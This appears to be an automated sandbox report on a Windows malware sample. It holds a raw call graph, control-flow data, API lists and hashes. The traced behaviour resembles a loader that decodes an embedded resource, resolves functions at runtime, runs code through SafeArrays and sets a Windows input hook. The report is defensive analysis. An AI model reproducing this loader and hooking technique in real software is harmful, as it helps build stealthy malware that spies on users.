85290->85291 85293 20e5f1c0 85291->85293 85294 23f7cb20 85295 23f7cb2c 85294->85295 85335 25030e2b 85295->85335 85343 25030e38 85295->85343 85296 23f7cbcb 85351 2503cb38 85296->85351 85357 2503cb28 85296->85357 85297 23f7cbf5 85363 250465b0 85297->85363 85368 250465c0 85297->85368 85298 23f7ccdc 85373 250b48fa 85298->85373 85378 250b4908 85298->85378 85299 23f7cded 85383 250b4e98 85299->85383 85388 250b4f98 85299->85388 85393 250b4fa8 85299->85393 85300 23f7cdf4 85398 250e09d0 85300->85398 85403 250e09bf 85300->85403 85301 23f7cefe 85408 250e0e8a 85301->85408 85413 250e0e98 85301->85413 85302 23f7cf05 85418 250e6eba 85302->85418 85423 250e6ec8 85302->85423 85303 23f7d00f 85428 250e7140 85303->85428 85433 250e7150 85303->85433 85304 23f7d016 85438 250ee800 85304->85438 85443 250ee810 85304->85443 85305 23f7d120 85448 250f6440 85305->85448 85307 23f7d342 85463 25b90520 85307->85463 85468 25b90511 85307->85468 85337 25030e5a 85335->85337 85336 25031241 85336->85296 85337->85336 85473 25037a28 85337->85473 85477 25037e0c 85337->85477 85338 25030f26 85338->85336 85481 2503afe8 85338->85481 85488 2503b183 85338->85488 85345 25030e5a 85343->85345 85344 25031241 85344->85296 85345->85344 85347 25037a28 LdrInitializeThunk 85345->85347 85348 25037e0c LdrInitializeThunk 85345->85348 85346 25030f26 85346->85344 85349 2503b183 4 API calls 85346->85349 85350 2503afe8 4 API calls 85346->85350 85347->85346 85348->85346 85349->85346 85350->85346 85352 2503cb5a 85351->85352 85353 2503cf39 85352->85353 85354 25037a28 LdrInitializeThunk 85352->85354 85353->85297 85356 2503cc24 85354->85356 85355 2503afe8 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 85355->85356 85356->85353 85356->85355 85359 2503cb38 85357->85359 85358 2503cf39 85358->85297 85359->85358 85360 25037a28 LdrInitializeThunk 85359->85360 85362 2503cc24 85360->85362 85361 2503afe8 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 85361->85362 85362->85358 85362->85361 85364 250465c0 85363->85364 85365 250466f4 85364->85365 85366 25037a28 LdrInitializeThunk 85364->85366 85367 25037e0c LdrInitializeThunk 85364->85367 85365->85298 85366->85365 85367->85365 85369 250465e2 85368->85369 85370 250466f4 85369->85370 85371 25037a28 LdrInitializeThunk 85369->85371 85372 25037e0c LdrInitializeThunk 85369->85372 85370->85298 85371->85370 85372->85370 85375 250b4908 85373->85375 85374 250b4a44 85374->85299 85375->85374 85376 25037a28 LdrInitializeThunk 85375->85376 85377 25037e0c LdrInitializeThunk 85375->85377 85376->85374 85377->85374 85379 250b492a 85378->85379 85380 250b4a44 85379->85380 85381 25037a28 LdrInitializeThunk 85379->85381 85382 25037e0c LdrInitializeThunk 85379->85382 85380->85299 85381->85380 85382->85380 85384 250b4ea6 85383->85384 85385 250b509d 85384->85385 85386 25037a28 LdrInitializeThunk 85384->85386 85387 25037e0c LdrInitializeThunk 85384->85387 85385->85300 85386->85385 85387->85385 85389 250b4fa8 85388->85389 85390 250b509d 85389->85390 85391 25037a28 LdrInitializeThunk 85389->85391 85392 25037e0c LdrInitializeThunk 85389->85392 85390->85300 85391->85390 85392->85390 85394 250b4fa9 85393->85394 85395 250b509d 85394->85395 85396 25037a28 LdrInitializeThunk 85394->85396 85397 25037e0c LdrInitializeThunk 85394->85397 85395->85300 85396->85395 85397->85395 85399 250e09f2 85398->85399 85400 250e0ac5 85399->85400 85401 25037a28 LdrInitializeThunk 85399->85401 85402 25037e0c LdrInitializeThunk 85399->85402 85400->85301 85401->85400 85402->85400 85404 250e09d0 85403->85404 85405 250e0ac5 85404->85405 85406 25037a28 LdrInitializeThunk 85404->85406 85407 25037e0c LdrInitializeThunk 85404->85407 85405->85301 85406->85405 85407->85405 85409 250e0e98 85408->85409 85410 250e0f5f 85409->85410 85411 25037a28 LdrInitializeThunk 85409->85411 85412 25037e0c LdrInitializeThunk 85409->85412 85410->85302 85411->85410 85412->85410 85414 250e0eb4 85413->85414 85415 250e0f5f 85414->85415 85416 25037a28 LdrInitializeThunk 85414->85416 85417 25037e0c LdrInitializeThunk 85414->85417 85415->85302 85416->85415 85417->85415 85419 250e6ec8 85418->85419 85420 250e6f8f 85419->85420 85421 25037a28 LdrInitializeThunk 85419->85421 85422 25037e0c LdrInitializeThunk 85419->85422 85420->85303 85421->85420 85422->85420 85424 250e6ee4 85423->85424 85425 250e6f8f 85424->85425 85426 25037a28 LdrInitializeThunk 85424->85426 85427 25037e0c LdrInitializeThunk 85424->85427 85425->85303 85426->85425 85427->85425 85429 250e7150 85428->85429 85430 250e7222 85429->85430 85431 25037a28 LdrInitializeThunk 85429->85431 85432 25037e0c LdrInitializeThunk 85429->85432 85430->85304 85431->85430 85432->85430 85434 250e7172 85433->85434 85435 250e7222 85434->85435 85436 25037a28 LdrInitializeThunk 85434->85436 85437 25037e0c LdrInitializeThunk 85434->85437 85435->85304 85436->85435 85437->85435 85439 250ee810 85438->85439 85440 250ee8e2 85439->85440 85441 25037a28 LdrInitializeThunk 85439->85441 85442 25037e0c LdrInitializeThunk 85439->85442 85440->85305 85441->85440 85442->85440 85444 250ee832 85443->85444 85445 250ee8e2 85444->85445 85446 25037a28 LdrInitializeThunk 85444->85446 85447 25037e0c LdrInitializeThunk 85444->85447 85445->85305 85446->85445 85447->85445 85449 250f645c 85448->85449 85450 23f7d238 85449->85450 85451 25037a28 LdrInitializeThunk 85449->85451 85452 25037e0c LdrInitializeThunk 85449->85452 85453 250fc470 85450->85453 85458 250fc460 85450->85458 85451->85450 85452->85450 85454 250fc48c 85453->85454 85455 250fc537 85454->85455 85456 25037a28 LdrInitializeThunk 85454->85456 85457 25037e0c LdrInitializeThunk 85454->85457 85455->85307 85456->85455 85457->85455 85459 250fc470 85458->85459 85460 250fc537 85459->85460 85461 25037a28 LdrInitializeThunk 85459->85461 85462 25037e0c LdrInitializeThunk 85459->85462 85460->85307 85461->85460 85462->85460 85464 25b9052f 85463->85464 85512 25b909c0 85464->85512 85518 25b909e0 85464->85518 85469 25b90520 85468->85469 85471 25b909e0 8 API calls 85469->85471 85472 25b909c0 8 API calls 85469->85472 85470 23f7d3ea 85471->85470 85472->85470 85476 25037a59 85473->85476 85474 25037bb9 85474->85338 85475 25037f49 LdrInitializeThunk 85475->85474 85476->85474 85476->85475 85478 25037cc3 85477->85478 85479 25037f49 LdrInitializeThunk 85478->85479 85480 25037f61 85479->85480 85480->85338 85482 2503b00f 85481->85482 85483 2503b12b 85482->85483 85495 2503b2a0 85482->85495 85499 2503b43c 85482->85499 85504 2503b3dc 85482->85504 85508 2503b290 85482->85508 85483->85338 85489 2503b047 85488->85489 85490 2503b12b 85489->85490 85491 2503b290 LdrInitializeThunk 85489->85491 85492 2503b2a0 LdrInitializeThunk 85489->85492 85493 2503b43c LdrInitializeThunk 85489->85493 85494 2503b3dc LdrInitializeThunk 85489->85494 85490->85338 85491->85490 85492->85490 85493->85490 85494->85490 85496 2503b2c8 LdrInitializeThunk 85495->85496 85498 2503b2fe 85496->85498 85498->85483 85500 2503b3bb 85499->85500 85502 2503b441 85499->85502 85501 2503b2fe 85500->85501 85503 2503b2f1 LdrInitializeThunk 85500->85503 85501->85483 85502->85483 85503->85501 85505 2503b3bb 85504->85505 85506 2503b2f1 LdrInitializeThunk 85505->85506 85507 2503b2fe 85505->85507 85506->85507 85507->85483 85509 2503b293 LdrInitializeThunk 85508->85509 85511 2503b2fe 85509->85511 85511->85483 85513 25b909c5 85512->85513 85524 25b910b0 85513->85524 85532 25b910c0 85513->85532 85540 25b91062 85513->85540 85514 25b90a2e 85514->85514 85519 25b90a0e 85518->85519 85521 25b910b0 8 API calls 85519->85521 85522 25b910c0 8 API calls 85519->85522 85523 25b91062 8 API calls 85519->85523 85520 25b90a2e 85520->85520 85521->85520 85522->85520 85523->85520 85526 25b910c0 85524->85526 85525 25b912c9 85527 25b91324 85525->85527 85560 25b9bdc8 85525->85560 85565 25b9bdb9 85525->85565 85526->85525 85526->85527 85548 25b925d8 85526->85548 85554 25b925e8 85526->85554 85527->85514 85534 25b910e5 85532->85534 85533 25b912c9 85535 25b91324 85533->85535 85538 25b9bdb9 2 API calls 85533->85538 85539 25b9bdc8 2 API calls 85533->85539 85534->85533 85534->85535 85536 25b925e8 5 API calls 85534->85536 85537 25b925d8 5 API calls 85534->85537 85535->85514 85536->85533 85537->85533 85538->85535 85539->85535 85542 25b9107f 85540->85542 85541 25b912c9 85543 25b91324 85541->85543 85546 25b9bdb9 2 API calls 85541->85546 85547 25b9bdc8 2 API calls 85541->85547 85542->85541 85542->85543 85544 25b925e8 5 API calls 85542->85544 85545 25b925d8 5 API calls 85542->85545 85543->85514 85544->85541 85545->85541 85546->85543 85547->85543 85549 25b92609 85548->85549 85550 25b9262d 85549->85550 85570 25b927f1 85549->85570 85577 25b92798 85549->85577 85581 25b92788 85549->85581 85550->85525 85556 25b92609 85554->85556 85555 25b9262d 85555->85525 85556->85555 85557 25b92798 5 API calls 85556->85557 85558 25b92788 5 API calls 85556->85558 85559 25b927f1 5 API calls 85556->85559 85557->85555 85558->85555 85559->85555 85563 25b9be2d 85560->85563 85561 25b9c290 WaitMessage 85561->85563 85563->85561 85564 25b9be7a 85563->85564 85637 25b9ad24 85563->85637 85564->85527 85568 25b9be2d 85565->85568 85566 25b9c290 WaitMessage 85566->85568 85567 25b9ad24 DispatchMessageW 85567->85568 85568->85566 85568->85567 85569 25b9be7a 85568->85569 85569->85527 85571 25b9278a 85570->85571 85572 25b927ff 85570->85572 85574 25b927de 85571->85574 85585 25b90dd4 85571->85585 85576 25b92850 85572->85576 85589 25b90e08 85572->85589 85574->85550 85576->85576 85578 25b927a5 85577->85578 85579 25b927de 85578->85579 85580 25b90dd4 5 API calls 85578->85580 85579->85550 85580->85579 85582 25b92798 85581->85582 85583 25b927de 85582->85583 85584 25b90dd4 5 API calls 85582->85584 85583->85550 85584->85583 85586 25b90ddf 85585->85586 85587 25b90e08 5 API calls 85586->85587 85588 25b92850 85586->85588 85587->85588 85590 25b90e13 85589->85590 85596 25b90e18 85590->85596 85592 25b928bf 85600 25b975f8 85592->85600 85609 25b97610 85592->85609 85593 25b928f9 85593->85576 85599 25b90e23 85596->85599 85597 25b93cc0 85597->85592 85598 25b925e8 5 API calls 85598->85597 85599->85597 85599->85598 85602 25b97641 85600->85602 85604 25b97741 85600->85604 85601 25b9764d 85601->85593 85602->85601 85618 25b97888 85602->85618 85621 25b9787b 85602->85621 85603 25b9768d 85607 25259b60 4 API calls 85603->85607 85608 25259b50 4 API calls 85603->85608 85604->85593 85607->85604 85608->85604 85611 25b97641 85609->85611 85613 25b97741 85609->85613 85610 25b9764d 85610->85593 85611->85610 85614 25b97888 4 API calls 85611->85614 85615 25b9787b 4 API calls 85611->85615 85612 25b9768d 85616 25259b60 4 API calls 85612->85616 85617 25259b50 4 API calls 85612->85617 85613->85593 85614->85612 85615->85612 85616->85613 85617->85613 85624 25b978b8 85618->85624 85619 25b97892 85619->85603 85622 25b97892 85621->85622 85623 25b978b8 4 API calls 85621->85623 85622->85603 85623->85622 85625 25b978d9 85624->85625 85627 25b978f4 85624->85627 85629 25258fb4 GetModuleHandleW 85625->85629 85630 2525a2a0 2 API calls 85625->85630 85631 2525a2b0 2 API calls 85625->85631 85633 2525a5d8 85625->85633 85626 25b978e4 85626->85627 85628 25b978b8 4 API calls 85626->85628 85627->85619 85628->85627 85629->85626 85630->85626 85631->85626 85634 2525a5e0 GetModuleHandleW 85633->85634 85636 2525a684 85634->85636 85636->85626 85638 25b9d038 DispatchMessageW 85637->85638 85639 25b9d0c5 85638->85639 85639->85563 85640 2525dfd8 DuplicateHandle 85641 2525e0b5 85640->85641 85642 2525fe78 85643 2525fe9c 85642->85643 85649 20e5feb0 85643->85649 85644 2525feb8 85645 2525ff3e 85644->85645 85647 25b90511 8 API calls 85644->85647 85648 25b90520 8 API calls 85644->85648 85647->85645 85648->85645 85650 20e5fed4 85649->85650 85654 23f7fd28 85650->85654 85658 23f7fd20 85650->85658 85651 20e5ff3b 85651->85644 85655 23f7fd70 SetWindowsHookExA 85654->85655 85657 23f7fdeb 85655->85657 85657->85651 85660 23f7fd28 SetWindowsHookExA 85658->85660 85661 23f7fdeb 85660->85661 85661->85651 85662 40cbdd 85663 40cbe9 __lseeki64 85662->85663 85706 40d534 HeapCreate 85663->85706 85666 40cc46 85767 41087e 71 API calls 8 library calls 85666->85767 85669 40cc4c 85670 40cc50 85669->85670 85671 40cc58 __RTC_Initialize 85669->85671 85768 40cbb4 62 API calls 3 library calls 85670->85768 85708 411a15 67 API calls 3 library calls 85671->85708 85673 40cc57 85673->85671 85675 40cc66 85676 40cc72 GetCommandLineA 85675->85676 85677 40cc6a 85675->85677 85709 412892 71 API calls 3 library calls 85676->85709 85769 40e79a 62 API calls 3 library calls 85677->85769 85680 40cc71 85680->85676 85681 40cc82 85770 4127d7 107 API calls 3 library calls 85681->85770 85683 40cc8c 85684 40cc90 85683->85684 85685 40cc98 85683->85685 85771 40e79a 62 API calls 3 library calls 85684->85771 85710 41255f 106 API calls 6 library calls 85685->85710 85688 40cc97 85688->85685 85689 40cc9d 85690 40cca1 85689->85690 85691 40cca9 85689->85691 85772 40e79a 62 API calls 3 library calls 85690->85772 85711 40e859 73 API calls 5 library calls 85691->85711 85694 40cca8 85694->85691 85695 40ccb0 85696 40ccb5 85695->85696 85697 40ccbc 85695->85697 85773 40e79a 62 API calls 3 library calls 85696->85773 85712 4019f0 OleInitialize 85697->85712 85700 40ccbb 85700->85697 85701 40ccd8 85702 40ccea 85701->85702 85774 40ea0a 62 API calls _doexit 85701->85774 85775 40ea36 62 API calls _doexit 85702->85775 85705 40ccef __lseeki64 85707 40cc3a 85706->85707 85707->85666 85766 40cbb4 62 API calls 3 library calls 85707->85766 85708->85675 85709->85681 85710->85689 85711->85695 85713 401ab9 85712->85713 85776 40b99e 85713->85776 85715 401abf 85716 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 85715->85716 85742 402467 85715->85742 85717 401dc3 CloseHandle GetModuleHandleA 85716->85717 85721 401c55 85716->85721 85789 401650 85717->85789 85719 401e8b FindResourceA LoadResource LockResource SizeofResource 85791 40b84d 85719->85791 85724 401c9c CloseHandle 85721->85724 85729 401cf9 Module32Next 85721->85729 85724->85701 85725 401ecb _memset 85726 401efc SizeofResource 85725->85726 85727 401f1c 85726->85727 85728 401f5f 85726->85728 85727->85728 85847 401560 __VEC_memcpy ___sbh_free_block 85727->85847 85731 401f92 _memset 85728->85731 85848 401560 __VEC_memcpy ___sbh_free_block 85728->85848 85729->85717 85738 401d0f 85729->85738 85733 401fa2 FreeResource 85731->85733 85734 40b84d _malloc 62 API calls 85733->85734 85735 401fbb SizeofResource 85734->85735 85736 401fe5 _memset 85735->85736 85737 4020aa LoadLibraryA 85736->85737 85739 401650 85737->85739 85738->85724 85741 401dad Module32Next 85738->85741 85740 40216c GetProcAddress 85739->85740 85740->85742 85743 4021aa 85740->85743 85741->85717 85741->85738 85742->85701 85743->85742 85821 4018f0 85743->85821 85745 40243f 85745->85742 85849 40b6b5 62 API calls __lseeki64 85745->85849 85747 4021f1 85747->85745 85833 401870 85747->85833 85749 402269 VariantInit 85750 401870 75 API calls 85749->85750 85751 40228b VariantInit 85750->85751 85752 4022a7 85751->85752 85753 4022d9 SafeArrayCreate SafeArrayAccessData 85752->85753 85838 40b350 85753->85838 85756 40232c 85757 402354 SafeArrayDestroy 85756->85757 85765 40235b 85756->85765 85757->85765 85758 402392 SafeArrayCreateVector 85759 4023a4 85758->85759 85760 4023bc VariantClear VariantClear 85759->85760 85840 4019a0 85760->85840 85763 40242e 85764 4019a0 65 API calls 85763->85764 85764->85745 85765->85758 85766->85666 85767->85669 85768->85673 85769->85680 85770->85683 85771->85688 85772->85694 85773->85700 85774->85702 85775->85705 85777 40b9aa __lseeki64 _strnlen 85776->85777 85778 40b9b8 85777->85778 85781 40b9ec 85777->85781 85850 40bfc1 62 API calls __getptd_noexit 85778->85850 85780 40b9bd 85851 40e744 6 API calls 2 library calls 85780->85851 85852 40d6e0 62 API calls 2 library calls 85781->85852 85784 40b9cd __lseeki64 85784->85715 85785 40b9f3 85853 40b917 120 API calls 3 library calls 85785->85853 85787 40b9ff 85854 40ba18 LeaveCriticalSection _doexit 85787->85854 85790 4017cc _realloc 85789->85790 85790->85719 85792 40b900 85791->85792 85802 40b85f 85791->85802 85862 40d2e3 6 API calls __decode_pointer 85792->85862 85794 40b906 85863 40bfc1 62 API calls __getptd_noexit 85794->85863 85799 40b8bc RtlAllocateHeap 85799->85802 85801 40b870 85801->85802 85855 40ec4d 62 API calls 2 library calls 85801->85855 85856 40eaa2 62 API calls 7 library calls 85801->85856 85857 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 85801->85857 85802->85799 85802->85801 85803 40b8ec 85802->85803 85806 40b8f1 85802->85806 85808 401ebf 85802->85808 85858 40b7fe 62 API calls 4 library calls 85802->85858 85859 40d2e3 6 API calls __decode_pointer 85802->85859 85860 40bfc1 62 API calls __getptd_noexit 85803->85860 85861 40bfc1 62 API calls __getptd_noexit 85806->85861 85809 40af66 85808->85809 85811 40af70 85809->85811 85810 40b84d _malloc 62 API calls 85810->85811 85811->85810 85812 40af8a 85811->85812 85814 40af8c std::bad_alloc::bad_alloc 85811->85814 85864 40d2e3 6 API calls __decode_pointer 85811->85864 85812->85725 85819 40afb2 85814->85819 85865 40d2bd 73 API calls __cinit 85814->85865 85816 40afbc 85867 40cd39 RaiseException 85816->85867 85866 40af49 62 API calls std::exception::exception 85819->85866 85820 40afca 85822 401903 lstrlenA 85821->85822 85823 4018fc 85821->85823 85868 4017e0 85822->85868 85823->85747 85826 401940 GetLastError 85828 40194b MultiByteToWideChar 85826->85828 85829 40198d 85826->85829 85827 401996 85827->85747 85830 4017e0 77 API calls 85828->85830 85829->85827 85884 401030 GetLastError EntryPoint 85829->85884 85831 401970 MultiByteToWideChar 85830->85831 85831->85829 85834 40af66 74 API calls 85833->85834 85835 40187c 85834->85835 85836 401885 SysAllocString 85835->85836 85837 4018a4 85835->85837 85836->85837 85837->85749 85839 40231a SafeArrayUnaccessData 85838->85839 85839->85756 85841 4019df VariantClear 85840->85841 85842 4019aa InterlockedDecrement 85840->85842 85841->85763 85842->85841 85843 4019b8 85842->85843 85843->85841 85844 4019c2 SysFreeString 85843->85844 85845 4019c9 85843->85845 85844->85845 85888 40aec0 63 API calls __lseeki64 85845->85888 85847->85727 85848->85731 85849->85742 85850->85780 85852->85785 85853->85787 85854->85784 85855->85801 85856->85801 85858->85802 85859->85802 85860->85806 85861->85808 85862->85794 85863->85808 85864->85811 85865->85819 85866->85816 85867->85820 85869 4017f3 85868->85869 85870 4017e9 EntryPoint 85868->85870 85871 401805 85869->85871 85872 4017fb EntryPoint 85869->85872 85870->85869 85873 401818 85871->85873 85874 40180e EntryPoint 85871->85874 85872->85871 85875 40183e 85873->85875 85881 401844 85873->85881 85885 40b783 72 API calls 4 library calls 85873->85885 85874->85873 85886 40b6b5 62 API calls __lseeki64 85875->85886 85879 40186d MultiByteToWideChar 85879->85826 85879->85827 85880 40184e EntryPoint 85880->85881 85881->85879 85881->85880 85887 40b743 62 API calls 2 library calls 85881->85887 85882 40182d 85882->85881 85883 401834 EntryPoint 85882->85883 85883->85875 85885->85882 85886->85881 85887->85881 85888->85841 85889 250efdf0 85890 250efe14 85889->85890 85891 25b910b0 8 API calls 85890->85891 85892 25b910c0 8 API calls 85890->85892 85893 25b91062 8 API calls 85890->85893 85891->85890 85892->85890 85893->85890

                                                                                                                                            Executed Functions

                                                                                                                                            Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 25 401c85-401c8d 19->25 20->21 22 401cb0-401cce call 401650 21->22 23 401c9c-401caf CloseHandle 21->23 32 401cd0-401cd4 22->32 25->14 25->20 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 42 401cf5-401cf7 35->42 40 401cda-401ce0 36->40 41 401cec-401cee 36->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->35 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 67 401d55-401d57 62->67 65 401d3a-401d40 63->65 66 401d4c-401d4e 63->66 65->62 70 401d42-401d4a 65->70 66->67 67->23 71 401d5d-401d7b call 401650 67->71 70->60 70->66 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 1f25d006 122->154 155 40234e call 1f25d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 1f25d006 135->152 153 402390 call 1f25d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                            APIs
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                            • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                            • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                            • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                            • _memset.LIBCMT ref: 00401EDD
                                                                                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                            • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                            • API String ID: 1430744539-2962942730
                                                                                                                                            • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                            • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                            • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                            • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                            Function 25046C18 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH]q$PH]q
                                                                                                                                            • API String ID: 0-1166926398
                                                                                                                                            • Opcode ID: a33a71be2a62dfd97b98e02d384bf5ace164ef0f951afb10a42eb9654256caad
                                                                                                                                            • Instruction ID: 2a3644187a4e565755ab609d57dc0ba91db0247db56e4f640831d2c48bd17bb2
                                                                                                                                            • Opcode Fuzzy Hash: a33a71be2a62dfd97b98e02d384bf5ace164ef0f951afb10a42eb9654256caad
                                                                                                                                            • Instruction Fuzzy Hash: 1C81CF74E00218CFDB18DFAAD994A9DBBF2BF89304F20816AD419AB354EB356D45CF50
                                                                                                                                            Function 25B9BDC8 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3767535563.0000000025B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 25B90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25b90000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            • Opcode ID: 0d12f2594d5b462dc26513bc59219cab33d0a39a4a6649eb712febd3122d5ff1
                                                                                                                                            • Instruction ID: 3ba60754cc7158ad7c94ef265196bf7622be0ff67acd7283ac8795272225f1d8
                                                                                                                                            • Opcode Fuzzy Hash: 0d12f2594d5b462dc26513bc59219cab33d0a39a4a6649eb712febd3122d5ff1
                                                                                                                                            • Instruction Fuzzy Hash: 11F11C30A00219CFDB08DFA9C984B9DBBF2FF48315F258569E809AB265DB75E945CF40
                                                                                                                                            Function 25037A28 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c3c00ebee83ea1a9ead1a2b1f0920f160afcdab99e12f42d1d09da9a1085459c
                                                                                                                                            • Instruction ID: a8803628d4909d1fe0c30d52779dba91c6a63d580f0ae9490303c4c656e57e91
